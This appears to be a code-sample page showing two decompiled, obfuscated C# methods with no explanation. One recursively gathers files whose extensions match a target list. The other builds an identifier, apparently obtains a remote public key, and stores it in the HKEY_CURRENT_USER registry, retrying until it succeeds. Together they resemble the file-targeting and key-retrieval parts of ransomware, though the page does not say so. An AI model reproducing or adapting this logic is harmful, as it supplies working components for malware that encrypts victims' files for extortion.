Ejemplo n.º 1
0
 public void method_19(List <string> list_0, string string_7)
 {
     try
     {
         string[] array = Delegate194.smethod_0(string_7, "*.*");
         for (int i = 0; i < array.Length; i++)
         {
             string   text    = array[i];
             string   object_ = Delegate195.smethod_0(text);
             string[] array2  = this.string_6;
             for (int j = 0; j < array2.Length; j++)
             {
                 string text2 = array2[j];
                 if (Delegate98.smethod_1(text2, Delegate143.smethod_0(object_)) && !this.method_16(text))
                 {
                     list_0.Add(text);
                     this.method_17(text);
                 }
             }
         }
         string[] array3 = Delegate196.smethod_0(string_7);
         for (int k = 0; k < array3.Length; k++)
         {
             string string_8 = array3[k];
             if (!this.method_6(string_8))
             {
                 this.method_19(list_0, string_8);
             }
         }
     }
     catch (Exception object_2)
     {
         Delegate100.smethod_2(Delegate197.smethod_0(object_2));
     }
 }
Ejemplo n.º 2
0
    public bool method_12(string string_7)
    {
        bool   flag  = false;
        string text  = Delegate88.smethod_0("HKEY_CURRENT_USER\\Software\\", this.string_3, "\\Keys");
        string text2 = (string)Delegate169.smethod_0(text, "Public", "");

        if (Delegate98.smethod_1(text2, ""))
        {
            while (!flag)
            {
                string text3 = this.method_9(49, Delegate179.smethod_0(new object[]
                {
                    ":",
                    this.int_2,
                    ":",
                    this.int_3
                }));
                string object_ = this.method_8(Delegate124.smethod_0(string_7, text3));
                if (Delegate98.smethod_0(object_, ""))
                {
                    Delegate127.smethod_0(text, "Public", object_, RegistryValueKind.String);
                    return(true);
                }
                Delegate104.smethod_0(this.int_1);
            }
            return(false);
        }
        Delegate100.smethod_2("Public already exsits");
        return(true);
    }